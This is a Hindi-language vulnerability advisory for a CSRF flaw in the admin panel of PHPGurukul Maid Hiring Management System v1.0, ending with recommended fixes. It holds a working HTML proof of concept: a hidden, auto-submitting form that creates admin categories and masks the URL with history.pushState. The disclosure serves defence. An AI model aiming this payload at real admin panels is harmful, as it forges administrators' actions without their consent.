
PHPGurukul Maid Hiring Management System v1.0 में CSRF भेद्यता के लिए प्रमाण-अवधारणा, जो दुर्भावनापूर्ण अनुरोधों के माध्यम से अनधिकृत श्रेणी निर्माण प्रदर्शित करता है।
परियोजना का नाम और रेपो URL: नौकरानी किराया प्रबंधन प्रणाली PHP और MySQL का उपयोग करके
भेद्यता प्रकार: क्लाइंट साइड अनुरोध जालसाजी
प्रभावित संस्करण: v1.0
💣भेद्यता विवरण: PHPGurukul किराया प्रबंधन प्रणाली के एडमिन पैनल में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है, जो एक हमलावर को एक प्रमाणित व्यवस्थापक को दुर्भावनापूर्ण साइट पर जाने के लिए धोखा देकर मनमानी किराया श्रेणियां जोड़ने की अनुमति देती है। इससे डेटा प्रदूषण और अनधिकृत व्यवस्थापक-स्तर परिवर्तन हो सकते हैं।
👩💻प्रभाव: अनधिकृत श्रेणी निर्माण
🛜प्रमाण-अवधारणा (PoC)

/admin/add-category.php पर POST अनुरोध भेजने के लिए HTML कोड
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


सिफारिश: एडमिन फॉर्म में CSRF टोकन लागू करें, SameSite कुकीज़ लागू करें, और अनधिकृत कार्रवाइयों को रोकने के लिए अनुरोध मूल को मान्य करें।